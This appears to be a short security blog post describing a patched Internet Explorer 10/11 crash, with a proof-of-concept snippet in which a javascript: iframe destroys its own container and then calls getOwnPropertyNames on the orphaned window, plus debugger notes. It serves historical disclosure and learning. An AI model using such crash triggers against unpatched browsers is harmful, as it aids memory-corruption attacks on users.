Probably Exploitable Crash: getOwnPropertyNames on Destroyed iFrame

Inserting an iFrame whose src attribute is a javascript: URL that simultaneously destroys the iFrame and calls Object.getOwnPropertyNames(window) crashes the browser. The crash was classified PROBABLY_EXPLOITABLE — data from the faulting address controls code flow.

function main() {
    document.getElementById("myDiv").innerHTML =
        '<iframe src="javascript:parent.document.getElementById(\'myDiv\').innerHTML = 1;' +
        'Object.getOwnPropertyNames(window)"></iframe>';
}

The iFrame destroys its own container by setting the parent’s innerHTML to 1, then immediately calls getOwnPropertyNames on its now-orphaned window object. The WinDBG session showed a null pointer read in jscript9!Js::CustomExternalObject::GetEnumerator with the data from the faulting address later used as a branch target. Tested on IE10 / IE11 build 20130312-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [OpenSearch Preview Pane: Local File Read, Full-Screen Popup, and Clipboard Access] :: [Address Bar Spoof via Mixed Document Modes and history.pushState] >